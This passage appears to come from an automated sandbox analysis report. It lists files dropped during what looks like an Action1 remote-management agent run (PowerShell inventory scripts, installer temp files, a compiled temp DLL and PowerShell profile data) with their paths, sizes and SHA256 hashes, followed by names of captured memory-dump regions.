                                    • Path C:\Windows\Action1\scripts\NTFS Disk Quotas_2035-1784023871.ps1
                                    • Size 2KB
                                    • SHA256 42666e20b7306295eb6a89cede8ab05b56aabe7dc781f5737e4af42169ee1a16
                                    • MD5 SHA1 SHA512 TLSH

                                    Open Shared Resources_2018-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Open Shared Resources_2018-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 e47bfc38cb4ad8dd21b9e7868e7ef5b24d3e838d28713327f0bd5d6ce1fc6267
                                    • MD5 SHA1 SHA512 TLSH

                                    SCSI Controllers_2027-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\SCSI Controllers_2027-1784023871.ps1
                                    • Size 2KB
                                    • SHA256 68aa3c420590f77d4265af278972898aa76f76e6be1fa6123c003936fd568b9b
                                    • MD5 SHA1 SHA512 TLSH

                                    Sound Devices_2038-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Sound Devices_2038-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 8107541e1b3b4ce7eda0e1bf921246fc2e7e2b756173609f074b7624a6f9fb36
                                    • MD5 SHA1 SHA512 TLSH

                                    Startup Programs_2032-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Startup Programs_2032-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 eda15ce66925eb90ee4facf1b01ff0913f8733501241abff1901090ae5cdac52
                                    • MD5 SHA1 SHA512 TLSH

                                    System Information_2023-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\System Information_2023-1784023871.ps1
                                    • Size 7KB
                                    • SHA256 b8c3902590f6493cf5f8db054fc10eb1e76cb358120ae1179b5f3fbe6c585a64
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    WebP Vulnerability Status_2051-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\WebP Vulnerability Status_2051-1784023871.ps1
                                    • Size 42KB
                                    • SHA256 eb82d1a496e609a1a96412b2d1a93c7c9be27c69466e4e9c1d646b9452690b0c
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    Windows 11 Hardware Compatibility_2065-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Windows 11 Hardware Compatibility_2065-1784023871.ps1
                                    • Size 21KB
                                    • SHA256 1d6e63dacd765e685a5d7559c798cd595e9d44e549069c428f9ae07cb11f9250
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    Windows Update Statistics_2039-1784023871.ps1

                                    • Path C:\Windows\Action1\scripts\Windows Update Statistics_2039-1784023871.ps1
                                    • Size 1KB
                                    • SHA256 94ddb597b28d3defd1aba399e92ac208d89ff76d71fb1b9f73bd28eaeb0fabbc
                                    • MD5 SHA1 SHA512 TLSH

                                    MSI82F.tmp

                                    • Path C:\Windows\Installer\MSI82F.tmp
                                    • Size 387KB
                                    • SHA256 ca5f0275e70ec5ba65b74c3da74f489018bc143c4c405fd8bbc6519eadac2a22
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    MSI979.tmp

                                    • Path C:\Windows\Installer\MSI979.tmp
                                    • Size 234KB
                                    • SHA256 78860e15e474cc2af7ad6e499a8971b6b8197afb8e49a1b9eaaa392e4378f3a5
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    00jp1z0k.dll

                                    • Path C:\Windows\SystemTemp\00jp1z0k\00jp1z0k.dll
                                    • Size 6KB
                                    • SHA256 d528828b8a4fd396522cd82bd149ee64c4de581665d5bc978d4b9ea2fc31bde0
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    RESB2A8.tmp

                                    • Path C:\Windows\SystemTemp\RESB2A8.tmp
                                    • Size 1KB
                                    • SHA256 2a2bc88bdc52f32e624cde03bbbd26163ff958d84e100065212d72b3c54c31fe
                                    • MD5 SHA1 SHA512 TLSH

                                    Tmp19CE.tmp

                                    • Path C:\Windows\SystemTemp\Tmp19CE.tmp
                                    • Size 1KB
                                    • SHA256 19effb08a7874a64729e56862d667124d518db5250a5abe1724bd2fff56c9abe
                                    • MD5 SHA1 SHA512 TLSH

                                    ModuleAnalysisCache

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                    • Size 8KB
                                    • SHA256 e9ff1810de6f48f2b309b4ab8ce6f1ad1fa752829a4a61c5e6a63e57a596e9be
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 134a0b49437178e09a8a43a1a071de16b10289a6b19fc996a15d5cc2f87b9d37
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 b6287c16f4837d75fbaf6636ee8faf009817ef0a85971e9250119a7723fe8b67
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 db42904062acae34583eeb5279f9d0acfc02a93bca0c219159545b42306f0bc0
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 dba4b539a07506167e7cfa9288d669b87a8f3679e62fd80f24e1554f9f6b9e65
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 714b4996be5d44ea6f36a6893b1ccb055d932b55deec9b3989d36f2f7cab2f84
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 caff0da7de4647e9767be967162922445b58630d9b73cb2508617a12d7d88db6
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 7fd85e882f38b5735e4016878b4a0c50951a1ed2abdd60c8e448e68a1367718a
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 cd63aa34ae65af16e90ac34d54b478c8cef9308d90246268bbd4f8c9ce453444
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 bb925b9d1d18efd6babdd646b451bf78dbc3ec9e24bf4d0ea8ec4d3ec433dbea
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 fa606866043197f75de4426de51670f2291a94433384efe403e0026db4429a69
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 f46b9f48c1e9a612bf96e7efe7788ba5c5ff2953c780c7e717b1d8973e5c0378
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 18bcfa1f66b592023d98417a3a705f35be635bf0a1ec0ce826a78738237d610b
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 120c6abb36026dc3f61f075430a1fd8c7068f9b74542306794e7b6d5d46d18c1
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 77dd2849c4ca9bab6a05228bb7242dc0618f1a0353c05d707b0de9dd93e2a48b
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 135955be7d8ff189fdcb373107d2766e7b1f1b36dd9b865c8b8b13145ad9c355
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 369b7b1b68cec2fc7d3da1b0338340ff2bf27194698889a16bb409a08c30d882
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 ab5854f0a72f738271cc809ffd41bdd445c49336a8c25bbc48c009b83015ba18
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 1KB
                                    • SHA256 6672f963ad361646c2db3c7e978795b5f66e91ee5a147f71e7530995b466b1f3
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 64B
                                    • SHA256 4f17593d9aa7fb7f382ab82bf771c95f8717d52d3e91ba3a6dc26952a776b64d
                                    • MD5 SHA1 SHA512

                                    00jp1z0k.0.cs

                                    • Path \??\c:\Windows\SystemTemp\00jp1z0k\00jp1z0k.0.cs
                                    • Size 6KB
                                    • SHA256 ff5117b8f681606ab5b2f5b58b0b0299856d48e1efd051112fec602bb1563da3
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    00jp1z0k.cmdline

                                    • Path \??\c:\Windows\SystemTemp\00jp1z0k\00jp1z0k.cmdline
                                    • Size 345B
                                    • SHA256 104bb6bbcd1b4953f04e8e20c0d900b4df646f639d1764d1c93d93657c0d8b5c
                                    • MD5 SHA1 SHA512 TLSH

                                    CSC4219D174D5F04FA68F97EFDFBB1F183C.TMP

                                    • Path \??\c:\Windows\SystemTemp\00jp1z0k\CSC4219D174D5F04FA68F97EFDFBB1F183C.TMP
                                    • Size 652B
                                    • SHA256 415b54502ba8f2f027cef344723b2f18e705f7d31f1298f885f882d2937a109c
                                    • MD5 SHA1 SHA512 TLSH

                                    memory/3452-119-0x000001DD011C0000-0x000001DD011CA000-memory.dmp

                                    memory/3452-118-0x000001DD19440000-0x000001DD194F2000-memory.dmp

                                    memory/3452-117-0x000001DD011A0000-0x000001DD011BE000-memory.dmp

                                    memory/3452-121-0x000001DD19680000-0x000001DD196A4000-memory.dmp

                                    memory/3452-120-0x000001DD19680000-0x000001DD196AA000-memory.dmp

                                    memory/3532-7-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-6-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-13-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-11-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-23-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-0-0x00007FFD1D88F000-0x00007FFD1D890000-memory.dmp

                                    memory/3532-14-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-10-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-15-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-9-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-8-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-17-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-4-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-3-0x00000216F3080000-0x00000216F30A2000-memory.dmp

                                    memory/3532-20-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-12-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-19-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-5-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3532-18-0x00007FFD1D700000-0x00007FFD1E0A4000-memory.dmp

                                    memory/3588-288-0x000001D759BE0000-0x000001D759C92000-memory.dmp

                                    memory/3592-371-0x000001D0A5C00000-0x000001D0A5C76000-memory.dmp

                                    memory/3592-372-0x000001D0A5B80000-0x000001D0A5B9E000-memory.dmp

                                    memory/3592-375-0x000001D0A5ED0000-0x000001D0A5F82000-memory.dmp

                                    memory/5224-202-0x00000253A6C30000-0x00000253A6C38000-memory.dmp

                                    memory/5532-149-0x000002787A780000-0x000002787A79E000-memory.dmp

                                    memory/5532-150-0x000002787A760000-0x000002787A76A000-memory.dmp

                                    memory/5532-151-0x000002787A770000-0x000002787A77A000-memory.dmp

                                    memory/5812-269-0x0000020679250000-0x0000020679302000-memory.dmp

                                    memory/5976-335-0x00000294A1180000-0x00000294A1232000-memory.dmp

                                    memory/5976-336-0x00000294A1270000-0x00000294A1286000-memory.dmp